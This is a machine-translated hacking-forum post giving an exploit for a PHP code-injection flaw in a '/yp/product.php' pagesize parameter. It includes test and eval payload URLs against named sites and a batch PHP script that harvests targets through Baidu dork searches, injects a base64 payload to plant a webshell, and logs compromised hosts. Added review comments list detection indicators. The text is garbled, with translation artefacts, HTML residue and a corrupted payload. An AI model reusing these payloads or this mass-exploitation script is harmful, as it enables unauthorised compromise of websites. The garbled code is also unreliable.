play enough, also a little chicken ribs, prompts the template didn't installed, and so on and so forth.. Someone coming The old na also send

The Google batch version still needs some work and will catch up later!

,

http://www.wooyun.org/bug.php? Action=view&Id=2984

test is as follows:

http://www.90sec.org/yp/product.php? Pagesize=${@ a phpinfo ()}

result:

http://www.cnqiyou.com/yp/product.php? Pagesize=${@ a phpinfo ()}

 

EXP:

http://www.cnqiyou.com/yp/product.php? Pagesize=${${% @ eval 28 $_POST [CMD] % 29}}

Direct links to chopper

http://www.script-home.com/softs/163997.html

batch EXP:

PS: according to the baidu search volume  

code is as follows:


<? PHP
// NOTE(review): this listing is a machine-translated copy. The stray "the", the altered
// capitalisation and the </p><P> residue mean it is not valid PHP as printed.
// Settings for the crawl below: only fatal errors are reported, the PHP execution time limit
// is removed, and the search query, socket timeout and result-page range are fixed here.
the error_reporting (E_ERROR);
set_time_limit (0); </p><P> $keyword='inurl: about/joinus';//bulk keyword
// $timeout is passed to the search-engine socket in ReadBaiduList().
$timeout=1;
// First and last result page iterated by the main loop.
$stratpage=1;
$lastpage=10000000;
// Main crawl loop: for each result page, ReadBaiduList() returns candidate hosts. Each host is
// checked against url. TXT and skipped if already listed; otherwise it is appended and probed
// with okbug(). Only when that probe succeeds are exploits() and okor() called, and hosts for
// which okor() returns true are appended to shell. TXT.
// NOTE(review): for defenders, the observable footprint of this loop is the traffic generated
// by okbug(), exploits() and okor(). All of it goes to paths under /yp/ on port 80.
the for ($I=$stratpage; $i<=$lastpage; $i++) {
$array=ReadBaiduList ($keyword, $timeout, $I);
foreach ($array as $url) {
$url_list=file (' url. TXT);
the if (in_array (" $url \ r \ n ", $url_list)) {
echo "[-] Links repeat \ n";
} else {
$fp=@ fopen (' url. TXT ', 'a');
@ fwrite ($fp, $url. "\ r \ n");
@ fclose ($fp);
print_r ("
[-] Get... $url \ r \ n ");
the if (okbug ($url)) {
$exploits=exploits ($url); </p><P> $ors=okor ($url);
the if ($ors) {
echo "[*] Shell: - >". $url. "/yp/fuck. PHP \ n";
$fp=@ fopen (' shell. TXT ', 'a');
@ fwrite ($fp, $url. "/yp/fuck. PHP \ r \ n");
@ fclose ($fp);

}} else {

print "[-] No Bug! \ n";

}}

}} </p><P> The function exploits ($url) {
// exploits($url): hand-builds one raw HTTP request for the target's /yp/product.php in which
// the pagesize query parameter carries a PHP ${...} expression, together with a form body
// holding parameters a and z0 (z0 is base64), and writes it to a socket on port 80.
// NOTE(review): the base64 body is corrupted in this copy (part of it has lost its letter
// case), so what it does server-side cannot be confirmed from this page. okor() afterwards
// looks for /yp/fuck.php, which suggests the body is meant to create that file - confirm
// against a captured sample before relying on this.
// Detection: pagesize values containing "${" or "eval", request bodies that eval a
// base64_decode of a POST field named z0, and the hard-coded X-Forwarded-For and
// Firefox/3.5.0 User-Agent values set below are usable web-log and WAF indicators.
$host=$url;
$port="80";
$content <A href="mailto:=a=@ eval (base64_decode ($_POST [z0])); & z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2 bfcipozskznagpsbazm9wzw4oj2z1y2sucghwjywgj2enktsgdqonqgz3cml0zsgkznasjzw % 2 fcghwiebldmfskcrfue9tvftjzmtpbmddkts % 2 fpicpow0kdubmy2xvc2uojgzwkts7zwnobygifdwtiik7zgllkck7 '" >A=='@ eval (base64_decode ($_POST [z0])); & Z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2 bfcipozskznagpsbazm9wzw4oj2z1y2sucghwjywgj2enktsgdqonqgz3cml0zsgkznasjzw % 2 fcghwiebldmfskcrfue9tvftjzmtpbmddkts % 2 fpicpow0kdubmy2xvc2uojgzwkts7zwnobygifdwtiik7zgllkck7 '</a>;
$data=' http://www.script-home.com//hack/POST/yp/product. The PHP? Pagesize=${${% @ eval 28 $_POST [a] % 29 }} HTTP/1.1 '. "\ r \ n";
$data.="X - Forwarded - For: 199.1.88.29 \ r \ n";
$data.="Referer: <a href=" http://$host\r\n ">http://$host\r\n" ;
$data.="content-type: application/x - WWW - form - urlencoded \ r \ n";
$data.="the user-agent: Mozilla/5.0 (Windows, Windows NT 5.1; en - US) Firefox/3.5.0 \ r \ n";
$data.="Host: $Host \ r \ n";
$data.="Content - Length:" strlen ($Content). "\ r \ n";
$data.="cache-control: no - Cache \ r \ n \ r \ n";
$data.=$content. "\ r \ n";
$ock=fsockopen ($host, $port);
the if (! $ock) {
echo "[*] No response from $host \ n";

} fwrite ($ock, $data);
the while (! Feof ($ock)) {$exp=
the fgets ($ock, 1024);
return $exp;

}} </p><P> The function okor ($host) {
// okor($host): requests the /yp/fuck. PHP path (as printed) from the host on port 80 and
// returns true when the response text contains the substring 200, false otherwise.
// NOTE(review): a request for this path in an access log indicates that this tool, or a copy
// of it, probed the site. A file of that name under /yp/ should be treated as an indicator
// of compromise.
$TMP=array ();
$datahttp://www.script-home.com//hack/=';
$fp=@ fsockopen ($host, 80, $errno, $errstr, 60).
@ fputs ($fp, "GET/yp/fuck. HTTP/1.1 PHP \ r \ nHost: $host \ r \ nConnection: Close \ r \ n \ r \ n");
the while ($fp & &! Feof ($fp))
$data.=fread ($fp, 102400);
@ fclose ($fp);
the if (strpos ($data, '200')!==false) {
return true;
} else {
return false.

}}
// okbug($host): vulnerability probe. Sends a GET for /yp/product.php whose pagesize parameter
// holds a ${...} expression calling phpinfo(), then returns true if the response matches the
// php.ini pattern below, false otherwise.
// NOTE(review): the server-side code that evaluates pagesize is not shown on this page.
// Presumably the value reaches a PHP string or template evaluation; casting pagesize to an
// integer before use would reject this input - verify against the application source.
function okbug ($host) {
$TMP=array ();
$datahttp://www.script-home.com//hack/=';
$fp=@ fsockopen ($host, 80, $errno, $errstr, 60).
@ fputs ($fp, 'GET/yp/product. PHP? View_type=1 & catid=& pagesize={${a phpinfo ()}} & areaname=& order=HTTP/1.1'. "\ r \ nHost: $host \ r \ nConnection: Close \ r \ n \ r \ n");
the while ($fp & &! Feof ($fp))
$data.=fread ($fp, 102400);
@ fclose ($fp);
the if (preg_match ('/(the php.ini)/I ', $data)) {
return true;
} else {
return false.

}} </p><P> The function ReadBaiduList ($keyword, $timeout, $nowpage)
{
// ReadBaiduList($keyword, $timeout, $nowpage): fetches one Baidu result page for $keyword at
// offset ($nowpage - 1) * 10, extracts link targets from the returned HTML with the regex
// below, and returns the part of each target before the first slash, i.e. a list of host names.
$TMP=array ();
//$datahttp://www.script-home.com//hack/=';
$nowpage=($nowpage - 1) * 10;
$fp=@ fsockopen (' http://www.baidu.com ', 80, at $errno, $errstr, $timeout);
@ fputs ($fp, "GET/s? Wd=" urlencode ($keyword). "& pn=". $nowpage. "HTTP/1.1 \ r \ nHost: [url] http://www.baidu.com [/url] \ r \ nConnection: Close \ r \ n \ r \ n");
the while ($fp & &! Feof ($fp))
$data.=fread ($fp, 1024);
@ fclose ($fp);
preg_match_all ("/\} \ \ "href=\ " HTTP/////([^ ~] *?) \ "target=\ " _blank \ "/I", $data, $TMP);
$num=count ($TMP [1]),
$array=array ();
the for ($I=0; $I <$num; $i++)
{
$row=explodes ('/', $TMP [1] [$I]);
$array []=str_replace (' http://', ' ', $row [0]);
}
return $array;

}? >

